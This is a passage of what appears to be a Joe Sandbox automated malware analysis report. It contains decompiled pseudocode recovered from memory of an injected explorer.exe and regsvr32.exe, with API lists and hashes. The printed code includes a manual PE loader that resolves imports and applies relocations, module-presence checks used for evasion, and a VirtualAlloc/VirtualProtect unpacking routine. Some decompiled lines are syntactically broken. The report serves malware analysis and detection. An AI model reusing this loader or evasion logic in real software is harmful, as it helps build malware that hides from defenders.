									asm("stosd");
									asm("stosd");
									asm("stosd");
									asm("stosd");
									_t211 =  *0xde684; // 0x280f8f0
									 *((intOrPtr*)(_t211 + 0xd8))( &_v608);
									_t215 = _v602 + 0x00000002 & 0x0000ffff;
									_v628 = _t215;
									_t277 = 0x3c;
									_v632 = _t215 / _t277 + _v604 & 0x0000ffff;
									_t249 = E000C8604(0x1000);
									_v624 = _t249;
									_pop(_t278);
									__eflags = _t249;
									if(_t249 != 0) {
										_t220 = E000C95E1(_t278, 0x32d);
										_t280 =  *0xde688; // 0xf0000
										_push(_t280 + 0x228);
										_t282 = 0x3c;
										_v636 = _t220;
										_push(_v628 % _t282 & 0x0000ffff);
										E000C9640(_t249, 0x1000, _t220, _v632 & 0x0000ffff);
										E000C85D5( &_v636);
										E000CA911(_t249, 0, 0xbb8, 1);
										E000C861A( &_v624, 0xfffffffe);
									}
									goto L41;
								}
							}
						} else {
							_t238 =  *((intOrPtr*)(_t262 + 0x214));
							__eflags = _t238 - _t246;
							if(_t238 == _t246) {
								goto L17;
							}
							__eflags =  *((intOrPtr*)(_t262 + 4)) - 6;
							if( *((intOrPtr*)(_t262 + 4)) >= 6) {
								L36:
								_t144 = E000C95E1(_t262, 0x610);
								_push(0);
								_push(_t144);
								_v616 = _t144;
								_t145 =  *0xde688; // 0xf0000
								_t329 = E000C92E5(_t145 + 0x228);
								_v612 = _t329;
								__eflags = _t329;
								if(_t329 != 0) {
									_t160 = E000CB269(_t329);
									__eflags = _t160;
									if(_t160 != 0) {
										_t163 =  *0xde684; // 0x280f8f0
										 *((intOrPtr*)(_t163 + 0x10c))(_t329);
									}
									E000C861A( &_v612, 0xfffffffe);
								}
								E000C85D5( &_v616);
								_t150 =  *0xde688; // 0xf0000
								lstrcpynW(_t150 + 0x438,  *0xde740, 0x105);
								_t153 =  *0xde688; // 0xf0000
								_t154 = _t153 + 0x228;
								__eflags = _t154;
								lstrcpynW(_t154,  *0xde738, 0x105);
								_t331 =  *0xde688; // 0xf0000
								_t117 = _t331 + 0x228; // 0xf0228
								 *((intOrPtr*)(_t331 + 0x434)) = E000C8FBE(_t117, __eflags);
								E000C861A(0xde740, 0xfffffffe);
								E000C861A(0xde738, 0xfffffffe);
								L41:
								_t159 = 0;
								__eflags = 0;
								L42:
								return _t159;
							}
							__eflags = _t238 - 2;
							if(_t238 != 2) {
								goto L36;
							}
							goto L17;
						}
					}
					L8:
					_t159 = _t122 | 0xffffffff;
					goto L42;
				}
				_t250 = E000C95C7(0x6e2);
				_v616 = _t250;
				_t326 = E000C95C7(0x9f5);
				_v612 = _t326;
				if(_t250 != 0 && _t326 != 0) {
					if(GetModuleHandleA(_t250) != 0 || GetModuleHandleA(_t326) != 0) {
						_v620 = 1;
					}
					E000C85C2( &_v616);
					_t122 = E000C85C2( &_v612);
					_t351 = _v620;
					if(_v620 != 0) {
						goto L8;
					}
				}
			}


















































































        0x000c4d6d
        0x000c4d73
        0x000c4d79
        0x000c4d7e
        0x000c4d8c
        0x000c4d8f
        0x000c4dee
        0x000c4e00
        0x000c4e03
        0x000c4e0a
        0x000c4e0f
        0x000c4e14
        0x000c4e1b
        0x000c4e25
        0x000c4e2c
        0x000c4e37
        0x000c4e3c
        0x000c4e43
        0x000c4e49
        0x000c4e4b
        0x000c4e4c
        0x000c4e50
        0x000c4e5b
        0x000c4e60
        0x000c4e69
        0x000c4e6e
        0x000c4e76
        0x000c4e7d
        0x000c4e7e
        0x000c4e80
        0x000c4e9c
        0x000c4e9f
        0x000c4e9f
        0x000c4ea8
        0x000c4ead
        0x000c4ebd
        0x000c4ec5
        0x000c4eca
        0x000c4ed0
        0x000c4ed3
        0x000c4ed9
        0x000c4ef8
        0x000c4efe
        0x000c4eff
        0x000c4f00
        0x000c4f01
        0x000c4f02
        0x000c4f03
        0x000c4f0d
        0x000c4f11
        0x000c4f16
        0x000c4f19
        0x000c4f1b
        0x000c4f2d
        0x000c4f2d
        0x000c4f2f
        0x000c4f3b
        0x000c4f40
        0x000c4f46
        0x000c4f4f
        0x000c4f52
        0x000c4f54
        0x000c4f5f
        0x000c4f64
        0x000c4f69
        0x000c4f6e
        0x000c4f6e
        0x000c4f71
        0x000c4f78
        0x00000000
        0x000c4f7e
        0x000c4f7e
        0x000c4f83
        0x000c4f87
        0x000c4f89
        0x000c4f8c
        0x000c4f8e
        0x000c4f94
        0x000c4f94
        0x000c4f8e
        0x000c4f96
        0x000c4f9b
        0x000c4fa1
        0x000c4fa3
        0x00000000
        0x000c4fa9
        0x000c4fa9
        0x000c4fad
        0x000c5082
        0x000c5088
        0x000c508e
        0x000c5099
        0x000c509a
        0x000c509b
        0x000c509c
        0x000c50a2
        0x000c50a7
        0x000c50ad
        0x000c50b5
        0x000c50bb
        0x000c50be
        0x000c50cd
        0x000c50d4
        0x000c50d7
        0x000c50e4
        0x000c50e8
        0x000c50f5
        0x000c50fa
        0x000c50fd
        0x000c50ff
        0x000c5110
        0x000c5112
        0x000c5116
        0x000c5117
        0x000c5119
        0x000c5124
        0x000c5129
        0x000c5136
        0x000c513a
        0x000c513b
        0x000c513d
        0x000c5145
        0x000c5146
        0x000c514b
        0x000c5163
        0x000c5168
        0x000c516b
        0x000c516f
        0x000c5171
        0x000c5184
        0x000c518e
        0x000c5192
        0x000c519a
        0x000c519b
        0x000c51a3
        0x000c51a4
        0x000c51a9
        0x000c51b5
        0x000c51bf
        0x000c51d1
        0x000c51dd
        0x000c51e2
        0x000c51e2
        0x000c51ec
        0x000c51f2
        0x000c51f2
        0x000c5119
        0x000c50ff
        0x00000000
        0x000c5088
        0x000c4fb3
        0x000c4fb6
        0x00000000
        0x00000000
        0x000c4fbc
        0x000c4fc7
        0x000c4fc8
        0x000c4fc9
        0x000c4fca
        0x000c4fd0
        0x000c4fd5
        0x000c4fe9
        0x000c4fee
        0x000c4ff2
        0x000c4ffd
        0x000c5006
        0x000c5008
        0x000c500c
        0x000c500d
        0x000c500f
        0x000c501a
        0x000c5020
        0x000c5032
        0x000c5035
        0x000c5038
        0x000c5045
        0x000c504d
        0x000c5057
        0x000c5069
        0x000c5075
        0x000c507a
        0x00000000
        0x000c500f
        0x000c4fa3
        0x000c4edb
        0x000c4edb
        0x000c4ee1
        0x000c4ee3
        0x00000000
        0x00000000
        0x000c4ee5
        0x000c4ee9
        0x000c51f3
        0x000c51f8
        0x000c51fe
        0x000c5200
        0x000c5201
        0x000c5205
        0x000c5215
        0x000c521a
        0x000c521e
        0x000c5220
        0x000c5224
        0x000c5229
        0x000c522b
        0x000c522d
        0x000c5233
        0x000c5233
        0x000c5240
        0x000c5246
        0x000c524c
        0x000c5251
        0x000c526f
        0x000c5271
        0x000c527d
        0x000c527d
        0x000c5283
        0x000c5285
        0x000c528b
        0x000c529d
        0x000c52a3
        0x000c52af
        0x000c52b7
        0x000c52b7
        0x000c52b7
        0x000c52b9
        0x000c52bf
        0x000c52bf
        0x000c4eef
        0x000c4ef2
        0x00000000
        0x00000000
        0x00000000
        0x000c4ef2
        0x000c4ed9
        0x000c4e1d
        0x000c4e1d
        0x00000000
        0x000c4e1d
        0x000c4d9b
        0x000c4da2
        0x000c4dab
        0x000c4dad
        0x000c4db3
        0x000c4dc4
        0x000c4dcd
        0x000c4dcd
        0x000c4dd9
        0x000c4de2
        0x000c4de7
        0x000c4dec
        0x00000000
        0x00000000
        0x000c4dec

        APIs
        • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 000C4DC0
        • GetModuleHandleA.KERNEL32(00000000), ref: 000C4DC7
        • lstrcpynW.KERNEL32(000EFBC8,00000105), ref: 000C526F
        • lstrcpynW.KERNEL32(000EFDD8,00000105), ref: 000C5283
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: HandleModulelstrcpyn
        • String ID:
        • API String ID: 3430401031-0
        • Opcode ID: b890a824844bce4d007567c7962961c6db42f7b36bf12e68b608a8b645727ba8
        • Instruction ID: c173cb8aab5dce0c54eecf333e52df57e25390bf92b520147ff03b0ab50bf869
        • Opcode Fuzzy Hash: b890a824844bce4d007567c7962961c6db42f7b36bf12e68b608a8b645727ba8
        • Instruction Fuzzy Hash: 36E1CF71604341AFE750EF64CC86FAE73E9AB98314F040A2EF944DB2D2DB74D9448B62
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000D2AEC, Relevance: 6.2, APIs: 4, Instructions: 219libraryloaderCOMMON
        Download Yara Rule
        C-Code - Quality: 52%
        			E000D2AEC(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				signed int* _v20;
				intOrPtr _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				intOrPtr* _v40;
				signed short* _v44;
				intOrPtr _v48;
				unsigned int _v52;
				intOrPtr _v56;
				_Unknown_base(*)()* _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				unsigned int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				signed int _t149;
				void* _t189;
				signed int _t194;
				signed int _t196;
				intOrPtr _t236;

				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v24 = _v72;
				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
				_v56 = _t236;
				if(_t236 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
						L35:
						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
						while(0 != 0) {
						}
						if(_a12 != 0) {
							 *_a12 = _v68;
						}
						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
						return _v68(_a4, 1, _a8);
					}
					_v84 = 0x80000000;
					_t149 = 8;
					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v20 =  *_v16 + _a4;
							}
							_v64 = _v64 & 0x00000000;
							while( *_v20 != 0) {
								if(( *_v20 & _v84) == 0) {
									_v88 =  *_v20 + _a4;
									_v60 = GetProcAddress(_v36, _v88 + 2);
								} else {
									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v20 = _v60;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
								}
								_v20 =  &(_v20[1]);
								_v64 = _v64 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t189 = 0xfffffffd;
							return _t189;
						}
					}
					goto L35;
				}
				_t194 = 8;
				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
				_t196 = 8;
				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
				while(0 != 0) {
				}
				while(_v48 > 0) {
					_v28 = _v44[2];
					_v48 = _v48 - _v28;
					_v28 = _v28 - 8;
					_v28 = _v28 >> 1;
					_v32 =  &(_v44[4]);
					_v80 = _a4 +  *_v44;
					_v52 = _v28;
					while(1) {
						_v76 = _v52;
						_v52 = _v52 - 1;
						if(_v76 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
						_v40 = (_v12 & 0x0000ffff) + _v80;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
								 *_v40 =  *_v40 + _v56;
							}
						} else {
							 *_v40 =  *_v40 + _v56;
						}
						_v32 =  &(_v32[1]);
					}
					_v44 = _v32;
				}
				goto L13;
			}





























        0x000d2afb
        0x000d2b01
        0x000d2b0a
        0x000d2b0d
        0x000d2b10
        0x00000000
        0x000d2c01
        0x000d2c05
        0x000d2c07
        0x000d2c15
        0x000d2d33
        0x000d2d3c
        0x000d2d3f
        0x000d2d43
        0x000d2d49
        0x000d2d51
        0x000d2d51
        0x000d2d59
        0x00000000
        0x000d2d64
        0x000d2c1b
        0x000d2c24
        0x000d2c32
        0x000d2c35
        0x000d2c52
        0x000d2c59
        0x000d2c6b
        0x000d2c6b
        0x000d2c72
        0x000d2c82
        0x000d2c9a
        0x000d2c84
        0x000d2c8c
        0x000d2c8c
        0x000d2c9d
        0x000d2ca1
        0x000d2cb1
        0x000d2cd4
        0x000d2ce6
        0x000d2cb3
        0x000d2cc7
        0x000d2cc7
        0x000d2cf0
        0x000d2d0c
        0x000d2cf2
        0x000d2d01
        0x000d2d01
        0x000d2d14
        0x000d2d1d
        0x000d2d1d
        0x000d2d2b
        0x00000000
        0x000d2c74
        0x000d2c76
        0x00000000
        0x000d2c76
        0x000d2c72
        0x00000000
        0x000d2c35
        0x000d2b18
        0x000d2b26
        0x000d2b2b
        0x000d2b36
        0x000d2b39
        0x000d2b3d
        0x000d2b3f
        0x000d2b4f
        0x000d2b58
        0x000d2b61
        0x000d2b69
        0x000d2b72
        0x000d2b7d
        0x000d2b83
        0x000d2b86
        0x000d2b89
        0x000d2b90
        0x000d2b97
        0x00000000
        0x00000000
        0x000d2ba2
        0x000d2bb0
        0x000d2bbb
        0x000d2bc5
        0x000d2bdd
        0x000d2bea
        0x000d2bea
        0x000d2bc7
        0x000d2bd2
        0x000d2bd2
        0x000d2bf1
        0x000d2bf1
        0x000d2bf9
        0x000d2bf9
        0x00000000

        APIs
        • GetModuleHandleA.KERNEL32(?), ref: 000D2C4C
        • LoadLibraryA.KERNEL32(?), ref: 000D2C65
        • GetProcAddress.KERNEL32(00000000,890CC483), ref: 000D2CC1
        • GetProcAddress.KERNEL32(00000000,?), ref: 000D2CE0
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: AddressProc$HandleLibraryLoadModule
        • String ID:
        • API String ID: 384173800-0
        • Opcode ID: a54a24278918fea252380e465b505e286e532335ad0441f8fdbb0e591644a7db
        • Instruction ID: 5402422793a648d839d8c1373124b4a30482a42bb4b40aad00deaa3b82b4c0c1
        • Opcode Fuzzy Hash: a54a24278918fea252380e465b505e286e532335ad0441f8fdbb0e591644a7db
        • Instruction Fuzzy Hash: 92A18A75A10209EFCB54CFA8C985AADBBF1FF08314F14845AE815EB361D774AA81CF64
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000C1C68, Relevance: 6.1, APIs: 4, Instructions: 106COMMON
        Download Yara Rule
        C-Code - Quality: 75%
        			E000C1C68(signed int __ecx, void* __eflags, void* __fp0) {
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				void* _t13;
				intOrPtr _t15;
				signed int _t16;
				intOrPtr _t17;
				signed int _t18;
				char _t20;
				intOrPtr _t22;
				void* _t23;
				void* _t24;
				intOrPtr _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t48;
				void* _t51;
				signed int _t61;
				signed int _t64;
				void* _t71;

				_t71 = __fp0;
				_t61 = __ecx;
				_t41 =  *0xde6dc; // 0x0
				_t13 = E000CA4BF(_t41, 0);
				while(_t13 < 0) {
					E000C980C( &_v28);
					_t43 =  *0xde6e0; // 0x0
					_t15 =  *0xde6e4; // 0x0
					_t41 = _t43 + 0xe10;
					asm("adc eax, ebx");
					__eflags = _t15 - _v24;
					if(__eflags > 0) {
						L9:
						_t16 = 0xfffffffe;
						L13:
						return _t16;
					}
					if(__eflags < 0) {
						L4:
						_t17 =  *0xde684; // 0x280f8f0
						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0xde6d0, 0);
						__eflags = _t18;
						if(_t18 == 0) {
							break;
						}
						_t35 =  *0xde684; // 0x280f8f0
						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
						_t41 =  *0xde6dc; // 0x0
						__eflags = 0;
						_t13 = E000CA4BF(_t41, 0);
						continue;
					}
					__eflags = _t41 - _v28;
					if(_t41 >= _v28) {
						goto L9;
					}
					goto L4;
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t20 =  *0xde6e8; // 0x0
				_v28 = _t20;
				_t22 = E000CA6A9(_t41, _t61,  &_v16);
				_v20 = _t22;
				if(_t22 != 0) {
					_t23 = GetCurrentProcess();
					_t24 = GetCurrentThread();
					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0xde6d0, 0, 0, 2);
					E000C980C(0xde6e0);
					_t64 = E000C1A1B( &_v28, E000C1226, _t71);
					__eflags = _t64;
					if(_t64 >= 0) {
						_push(0);
						_push( *0xde760);
						_t51 = 0x27;
						E000C9F06(_t51);
					}
				} else {
					_t64 = _t61 | 0xffffffff;
				}
				_t29 =  *0xde684; // 0x280f8f0
				 *((intOrPtr*)(_t29 + 0x30))( *0xde6d0);
				_t48 =  *0xde6dc; // 0x0
				 *0xde6d0 = 0;
				E000CA4DB(_t48);
				E000C861A( &_v24, 0);
				_t16 = _t64;
				goto L13;
			}

























        0x000c1c68
        0x000c1c75
        0x000c1c77
        0x000c1c7e
        0x000c1ce4
        0x000c1c8b
        0x000c1c90
        0x000c1c96
        0x000c1c9b
        0x000c1ca1
        0x000c1ca3
        0x000c1ca7
        0x000c1d15
        0x000c1d17
        0x000c1d99
        0x000c1d9f
        0x000c1d9f
        0x000c1ca9
        0x000c1cb1
        0x000c1cb1
        0x000c1cbd
        0x000c1cc3
        0x000c1cc5
        0x00000000
        0x00000000
        0x000c1cc7
        0x000c1cd1
        0x000c1cd7
        0x000c1cdd
        0x000c1cdf
        0x00000000
        0x000c1cdf
        0x000c1cab
        0x000c1caf
        0x00000000
        0x00000000
        0x00000000
        0x000c1caf
        0x000c1cee
        0x000c1cef
        0x000c1cf0
        0x000c1cf1
        0x000c1cf2
        0x000c1cf7
        0x000c1d01
        0x000c1d06
        0x000c1d0e
        0x000c1d29
        0x000c1d2c
        0x000c1d36
        0x000c1d41
        0x000c1d54
        0x000c1d56
        0x000c1d58
        0x000c1d5a
        0x000c1d5b
        0x000c1d63
        0x000c1d64
        0x000c1d6a
        0x000c1d10
        0x000c1d10
        0x000c1d10
        0x000c1d6b
        0x000c1d76
        0x000c1d79
        0x000c1d7f
        0x000c1d85
        0x000c1d90
        0x000c1d97
        0x00000000

        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: acaa18c433e5a6e4a1d924e382e7253824042e8834f82c148592d1f25155a873
        • Instruction ID: f2db016a6e86ac95650e658f1212804d8919bf6c937486c21d9280327b646b79
        • Opcode Fuzzy Hash: acaa18c433e5a6e4a1d924e382e7253824042e8834f82c148592d1f25155a873
        • Instruction Fuzzy Hash: E731C732605244AFE354EF64EC85EAE77A9EB55390B10092FF901CB2E3DE38DC048766
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000C1B2D, Relevance: 6.1, APIs: 4, Instructions: 97threadCOMMON
        Download Yara Rule
        C-Code - Quality: 73%
        			E000C1B2D(void* __eflags, void* __fp0) {
				char _v24;
				char _v28;
				void* _t12;
				intOrPtr _t14;
				void* _t15;
				intOrPtr _t16;
				void* _t17;
				void* _t19;
				void* _t20;
				char _t24;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t33;
				intOrPtr _t38;
				intOrPtr _t40;
				void* _t41;
				intOrPtr _t46;
				void* _t48;
				intOrPtr _t51;
				void* _t61;
				void* _t71;

				_t71 = __fp0;
				_t38 =  *0xde6f4; // 0x0
				_t12 = E000CA4BF(_t38, 0);
				while(_t12 < 0) {
					E000C980C( &_v28);
					_t40 =  *0xde700; // 0x0
					_t14 =  *0xde704; // 0x0
					_t41 = _t40 + 0x3840;
					asm("adc eax, ebx");
					__eflags = _t14 - _v24;
					if(__eflags > 0) {
						L13:
						_t15 = 0;
					} else {
						if(__eflags < 0) {
							L4:
							_t16 =  *0xde684; // 0x280f8f0
							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0xde6ec, 0);
							__eflags = _t17;
							if(_t17 == 0) {
								break;
							} else {
								_t33 =  *0xde684; // 0x280f8f0
								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
								_t51 =  *0xde6f4; // 0x0
								__eflags = 0;
								_t12 = E000CA4BF(_t51, 0);
								continue;
							}
						} else {
							__eflags = _t41 - _v28;
							if(_t41 >= _v28) {
								goto L13;
							} else {
								goto L4;
							}
						}
					}
					L12:
					return _t15;
				}
				E000C980C(0xde700);
				_t19 = GetCurrentProcess();
				_t20 = GetCurrentThread();
				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0xde6ec, 0, 0, 2);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t24 =  *0xde6e8; // 0x0
				_v28 = _t24;
				_t61 = E000C1A1B( &_v28, E000C131E, _t71);
				if(_t61 >= 0) {
					_push(0);
					_push( *0xde760);
					_t48 = 0x27;
					E000C9F06(_t48);
				}
				if(_v24 != 0) {
					E000C6890( &_v24);
				}
				_t26 =  *0xde684; // 0x280f8f0
				 *((intOrPtr*)(_t26 + 0x30))( *0xde6ec);
				_t28 =  *0xde758; // 0x0
				 *0xde6ec = 0;
				_t29 =  !=  ? 1 : _t28;
				_t46 =  *0xde6f4; // 0x0
				 *0xde758 =  !=  ? 1 : _t28;
				E000CA4DB(_t46);
				_t15 = _t61;
				goto L12;
			}
























        0x000c1b2d
        0x000c1b33
        0x000c1b41
        0x000c1baf
        0x000c1b4e
        0x000c1b53
        0x000c1b59
        0x000c1b5e
        0x000c1b64
        0x000c1b66
        0x000c1b6a
        0x000c1c64
        0x000c1c64
        0x000c1b70
        0x000c1b70
        0x000c1b7c
        0x000c1b7c
        0x000c1b88
        0x000c1b8e
        0x000c1b90
        0x00000000
        0x000c1b92
        0x000c1b92
        0x000c1b9c
        0x000c1ba2
        0x000c1ba8
        0x000c1baa
        0x00000000
        0x000c1baa
        0x000c1b72
        0x000c1b72
        0x000c1b76
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x000c1b76
        0x000c1b70
        0x000c1c5d
        0x000c1c63
        0x000c1c63
        0x000c1bb8
        0x000c1bcc
        0x000c1bcf
        0x000c1bd9
        0x000c1be5
        0x000c1bef
        0x000c1bf0
        0x000c1bf1
        0x000c1bf2
        0x000c1bf7
        0x000c1c00
        0x000c1c04
        0x000c1c06
        0x000c1c07
        0x000c1c0f
        0x000c1c10
        0x000c1c16
        0x000c1c1b
        0x000c1c21
        0x000c1c21
        0x000c1c26
        0x000c1c31
        0x000c1c34
        0x000c1c3c
        0x000c1c48
        0x000c1c4b
        0x000c1c51
        0x000c1c56
        0x000c1c5b
        0x00000000

        APIs
        • GetCurrentProcess.KERNEL32(000DE6EC,00000000,00000000,00000002), ref: 000C1BCC
        • GetCurrentThread.KERNEL32(00000000), ref: 000C1BCF
        • GetCurrentProcess.KERNEL32(00000000), ref: 000C1BD6
        • DuplicateHandle.KERNEL32 ref: 000C1BD9
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: Current$Process$DuplicateHandleThread
        • String ID:
        • API String ID: 3566409357-0
        • Opcode ID: 538cc19757898cffef8cf913ee8391aaf49bd930aa49bd22eda4a4af132a8de5
        • Instruction ID: 2b5b3560eca2b9c66e54fa8514e9480b8e1ea27dea2e81419eb01e222fcba38a
        • Opcode Fuzzy Hash: 538cc19757898cffef8cf913ee8391aaf49bd930aa49bd22eda4a4af132a8de5
        • Instruction Fuzzy Hash: C831A6716053419FE744FF64EC89EAE77A4EB55390B00456EF9018B2A3DA38DC04CB72
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000CB7A8, Relevance: 6.1, APIs: 4, Instructions: 83stringCOMMON
        Download Yara Rule
        C-Code - Quality: 94%
        			E000CB7A8(WCHAR* __ecx, void* __edx) {
				signed int _v8;
				long _v12;
				char _v16;
				short _v528;
				char _v1040;
				char _v1552;
				intOrPtr _t23;
				char _t27;
				intOrPtr _t28;
				signed int _t29;
				void* _t33;
				long _t38;
				WCHAR* _t43;
				WCHAR* _t56;

				_t44 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t43 = __edx;
				_t56 = __ecx;
				memset(__edx, 0, 0x100);
				_v12 = 0x100;
				_t23 =  *0xde684; // 0x280f8f0
				 *((intOrPtr*)(_t23 + 0xb0))( &_v528,  &_v12);
				lstrcpynW(_t43,  &_v528, 0x100);
				_t27 = E000C95E1(_t44, 0xa88);
				_v16 = _t27;
				_t28 =  *0xde684; // 0x280f8f0
				_t29 =  *((intOrPtr*)(_t28 + 0x68))(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
				asm("sbb eax, eax");
				_v8 = _v8 &  ~_t29;
				E000C85D5( &_v16);
				_t33 = E000CC392(_t43);
				E000C9640( &(_t43[E000CC392(_t43)]), 0x100 - _t33, L"%u", _v8);
				lstrcatW(_t43, _t56);
				_t38 = E000CC392(_t43);
				_v12 = _t38;
				CharUpperBuffW(_t43, _t38);
				return E000CD400(_t43, E000CC392(_t43) + _t40, 0);
			}

















        0x000cb7a8
        0x000cb7b1
        0x000cb7bd
        0x000cb7c3
        0x000cb7c5
        0x000cb7cd
        0x000cb7db
        0x000cb7e0
        0x000cb7ef
        0x000cb7fa
        0x000cb807
        0x000cb81c
        0x000cb821
        0x000cb826
        0x000cb828
        0x000cb82f
        0x000cb83f
        0x000cb850
        0x000cb85a
        0x000cb862
        0x000cb869
        0x000cb86c
        0x000cb889

        APIs
        • memset.MSVCRT ref: 000CB7C5
        • lstrcpynW.KERNEL32(?,?,00000100), ref: 000CB7EF
          • Part of subcall function 000C9640: _vsnwprintf.MSVCRT ref: 000C965D
        • lstrcatW.KERNEL32 ref: 000CB85A
        • CharUpperBuffW.USER32(?,00000000), ref: 000CB86C
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: BuffCharUpper_vsnwprintflstrcatlstrcpynmemset
        • String ID:
        • API String ID: 1024327890-0
        • Opcode ID: dfc5864c2b90876376009b67c939ce655e3198ce6944b79d75ab05716b14c094
        • Instruction ID: 2790561c89e92655b6e37f14f7a47cad77b00b55e4e119700a331dcc1739aec8
        • Opcode Fuzzy Hash: dfc5864c2b90876376009b67c939ce655e3198ce6944b79d75ab05716b14c094
        • Instruction Fuzzy Hash: 302156B2901218BFE714ABA4DC8AFEE77BCDF54310F10856AF505D6182EE75AF048B64
        Uniqueness

        Uniqueness Score: -1.00%

        Analysis Process: regsvr32.exe PID: 152 Parent PID: 804 regsvr32.exeCOMMON

        Executed Functions

        Function 1007792E, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON
        Download Yara Rule

        Control-flow Graph

        APIs
        • VirtualAlloc.KERNEL32(00000000,00000814,00003000,00000040,00000814,10077380), ref: 100779EB
        • VirtualAlloc.KERNEL32(00000000,000004CA,00003000,00000040,100773E0), ref: 10077A22
        • VirtualAlloc.KERNEL32(00000000,00028122,00003000,00000040), ref: 10077A82
        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 10077AB8
        • VirtualProtect.KERNEL32(10000000,00000000,00000004,1007790D), ref: 10077BBD
        • VirtualProtect.KERNEL32(10000000,00001000,00000004,1007790D), ref: 10077BE4
        • VirtualProtect.KERNEL32(00000000,?,00000002,1007790D), ref: 10077CB1
        • VirtualProtect.KERNEL32(00000000,?,00000002,1007790D,?), ref: 10077D07
        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 10077D23
        Memory Dump Source
        • Source File: 00000010.00000002.631423514.0000000010077000.00000040.00020000.sdmp, Offset: 10077000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_16_2_10077000_regsvr32.jbxd
        Similarity
        • API ID: Virtual$Protect$Alloc$Free
        • String ID:
        • API String ID: 2574235972-0
        • Opcode ID: 70a75cfa5ba03345d47f256e82c004e9dc0d4809c604307a2666930abcd254c7
        • Instruction ID: e61e719fcc5ffd65f3e7435c319bc58e36d786470a44bd70215d6a9d31556276
        • Opcode Fuzzy Hash: 70a75cfa5ba03345d47f256e82c004e9dc0d4809c604307a2666930abcd254c7
        • Instruction Fuzzy Hash: F8D18D767086009FDB11CF14C8C0B927BA6FF8C750B194599ED6D9F25AD7B4B810CBA4
        Uniqueness

        Uniqueness Score: -1.00%

        Function 10028D00, Relevance: 4.8, APIs: 3, Instructions: 254COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
